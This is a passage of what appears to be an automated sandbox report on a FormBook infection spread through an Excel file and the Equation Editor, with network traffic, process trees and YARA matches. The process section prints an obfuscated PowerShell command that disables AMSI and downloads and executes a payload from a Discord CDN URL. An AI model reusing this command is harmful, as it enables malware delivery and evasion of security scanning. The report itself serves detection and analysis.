                                                                                                                                                            Jul 22, 2021 17:18:19.448113918 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.448153019 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.448178053 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.448200941 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.448225975 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.448227882 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.448251009 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.448276043 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.448287964 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.448292017 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.448295116 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.448303938 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.448322058 CEST8049165172.245.119.43192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:19.449609041 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:19.966372967 CEST4916580192.168.2.22172.245.119.43
                                                                                                                                                            Jul 22, 2021 17:18:28.719181061 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:28.761347055 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:28.761425018 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:28.777571917 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:28.819237947 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:28.819916964 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:28.819962978 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:28.819997072 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:28.820035934 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:28.835294962 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:28.876610994 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:28.876653910 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:28.876728058 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.136651993 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.178015947 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.214484930 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.214765072 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.214776039 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.214792967 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.214818001 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.214848042 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.214852095 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.214871883 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.214879036 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.214905977 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.214906931 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.214934111 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.214935064 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.214966059 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.214998960 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.215456963 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.215497971 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.215563059 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.215588093 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.216429949 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.216455936 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.216512918 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.217019081 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.217063904 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.217175961 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.217978954 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.218008041 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.218054056 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.218107939 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.218935966 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.218974113 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.219091892 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.219111919 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.219921112 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.219955921 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.220025063 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.220906973 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.220933914 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.221004963 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.221887112 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.221918106 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.221976995 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.222841024 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.222867966 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.222935915 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.223858118 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.223901033 CEST44349166162.159.130.233192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:29.224039078 CEST49166443192.168.2.22162.159.130.233
                                                                                                                                                            Jul 22, 2021 17:18:29.224742889 CEST44349166162.159.130.233192.168.2.22

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jul 22, 2021 17:18:27.937916040 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                            Jul 22, 2021 17:18:27.996510029 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:27.999674082 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                            Jul 22, 2021 17:18:28.057944059 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:18:28.637098074 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                            Jul 22, 2021 17:18:28.696980953 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                            Jul 22, 2021 17:19:53.526026011 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                            Jul 22, 2021 17:19:53.601438999 CEST53612008.8.8.8192.168.2.22

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                            Jul 22, 2021 17:18:27.937916040 CEST192.168.2.228.8.8.80x5fafStandard query (0)google.comA (IP address)IN (0x0001)
                                                                                                                                                            Jul 22, 2021 17:18:27.999674082 CEST192.168.2.228.8.8.80xaf7eStandard query (0)google.comA (IP address)IN (0x0001)
                                                                                                                                                            Jul 22, 2021 17:18:28.637098074 CEST192.168.2.228.8.8.80x8559Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                            Jul 22, 2021 17:19:53.526026011 CEST192.168.2.228.8.8.80x2e78Standard query (0)www.jewelryengravings.comA (IP address)IN (0x0001)

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                            Jul 22, 2021 17:18:27.996510029 CEST8.8.8.8192.168.2.220x5fafNo error (0)google.com216.58.215.238A (IP address)IN (0x0001)
                                                                                                                                                            Jul 22, 2021 17:18:28.057944059 CEST8.8.8.8192.168.2.220xaf7eNo error (0)google.com216.58.215.238A (IP address)IN (0x0001)
                                                                                                                                                            Jul 22, 2021 17:18:28.696980953 CEST8.8.8.8192.168.2.220x8559No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                            Jul 22, 2021 17:18:28.696980953 CEST8.8.8.8192.168.2.220x8559No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                            Jul 22, 2021 17:18:28.696980953 CEST8.8.8.8192.168.2.220x8559No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                            Jul 22, 2021 17:18:28.696980953 CEST8.8.8.8192.168.2.220x8559No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                            Jul 22, 2021 17:18:28.696980953 CEST8.8.8.8192.168.2.220x8559No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                            Jul 22, 2021 17:19:53.601438999 CEST8.8.8.8192.168.2.220x2e78Name error (3)www.jewelryengravings.comnonenoneA (IP address)IN (0x0001)

                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                            • 172.245.119.43

                                                                                                                                                            HTTP Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            0192.168.2.2249165172.245.119.4380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Jul 22, 2021 17:18:19.023350000 CEST0OUTGET /d/obi.exe HTTP/1.1
                                                                                                                                                            Accept: */*
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                            Host: 172.245.119.43
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Jul 22, 2021 17:18:19.164860010 CEST1INHTTP/1.1 200 OK
                                                                                                                                                            Date: Thu, 22 Jul 2021 15:18:19 GMT
                                                                                                                                                            Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.21
                                                                                                                                                            Last-Modified: Fri, 16 Jul 2021 21:41:07 GMT
                                                                                                                                                            ETag: "6800-5c74471fec7eb"
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Content-Length: 26624
                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-msdownload
                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 68 f8 f1 60 00 00 00 00 00 00 00 00 f0 00 27 00 0b 02 02 1e 00 1e 00 00 00 48 00 00 00 0a 00 00 e0 14 00 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 e0 00 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 50 cc 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 50 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 92 00 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 1d 00 00 00 10 00 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 d0 00 00 00 00 30 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 50 c0 2e 72 64 61 74 61 00 00 30 15 00 00 00 40 00 00 00 16 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 70 64 61 74 61 00 00 70 02 00 00 00 60 00 00 00 04 00 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 78 64 61 74 61 00 00 f4 01 00 00 00 70 00 00 00 02 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 80 09 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 e8 07 00 00 00 90 00 00 00 08 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 a0 00 00 00 02 00 00 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 b0 00 00 00 02 00 00 00 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 76 6d 70 30 00 00 00 c0 0e 00 00 00 c0 00 00 00 10 00 00 00 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 63 6f 62 66 00 00 00 de 0b 00 00 00 d0 00 00 00 0c 00 00 00 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdh`'H@ PpP(.text(`P`.data0"@P.rdata0@$@`@.pdatap`:@0@.xdatap>@0@.bss`.idata@@0.CRThH@@.tlsJ@@.vmp0L`h.cobf\


                                                                                                                                                            HTTPS Packets

                                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                            Jul 22, 2021 17:18:28.819962978 CEST162.159.130.233443192.168.2.2249166CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                                                                                                            Code Manipulations

                                                                                                                                                            User Modules

                                                                                                                                                            Hook Summary

                                                                                                                                                            Function NameHook TypeActive in Processes
                                                                                                                                                            PeekMessageAINLINEexplorer.exe
                                                                                                                                                            PeekMessageWINLINEexplorer.exe
                                                                                                                                                            GetMessageWINLINEexplorer.exe
                                                                                                                                                            GetMessageAINLINEexplorer.exe

                                                                                                                                                            Processes

                                                                                                                                                            Process: explorer.exe, Module: USER32.dll
                                                                                                                                                            Function NameHook TypeNew Data
                                                                                                                                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEF
                                                                                                                                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEF
                                                                                                                                                            GetMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEF
                                                                                                                                                            GetMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEF

                                                                                                                                                            Statistics

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            Analysis Process: EXCEL.EXE PID: 2716 Parent PID: 584

                                                                                                                                                            General

                                                                                                                                                            Start time:17:17:44
                                                                                                                                                            Start date:22/07/2021
                                                                                                                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                            Imagebase:0x13f120000
                                                                                                                                                            File size:27641504 bytes
                                                                                                                                                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Analysis Process: EQNEDT32.EXE PID: 684 Parent PID: 584

                                                                                                                                                            General

                                                                                                                                                            Start time:17:18:07
                                                                                                                                                            Start date:22/07/2021
                                                                                                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:543304 bytes
                                                                                                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Analysis Process: vbc.exe PID: 2528 Parent PID: 684

                                                                                                                                                            General

                                                                                                                                                            Start time:17:18:09
                                                                                                                                                            Start date:22/07/2021
                                                                                                                                                            Path:C:\Users\Public\vbc.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:26624 bytes
                                                                                                                                                            MD5 hash:F5041EC4CE468A07ECBFD076BC0F879B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 20%, Metadefender, Browse
                                                                                                                                                            • Detection: 57%, ReversingLabs
                                                                                                                                                            Reputation:low

                                                                                                                                                            Analysis Process: powershell.exe PID: 2620 Parent PID: 2528

                                                                                                                                                            General

                                                                                                                                                            Start time:17:18:10
                                                                                                                                                            Start date:22/07/2021
                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,56,53,56,55,57,51,51,50,50,48,56,55,55,49,48,55,53,51,47,56,54,51,56,57,49,56,53,55,54,48,56,48,49,53,57,48,50,47,111,97,100,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($676544567888888888876545666778)|I`E`X
                                                                                                                                                            Imagebase:0x13ffd0000
                                                                                                                                                            File size:473600 bytes
                                                                                                                                                            MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Reputation:high

                                                                                                                                                            Analysis Process: calc.exe PID: 1900 Parent PID: 2620

                                                                                                                                                            General

                                                                                                                                                            Start time:17:18:37
                                                                                                                                                            Start date:22/07/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\calc.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:{path}
                                                                                                                                                            Imagebase:0xf30000
                                                                                                                                                            File size:776192 bytes
                                                                                                                                                            MD5 hash:60B7C0FEAD45F2066E5B805A91F4F0FC
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
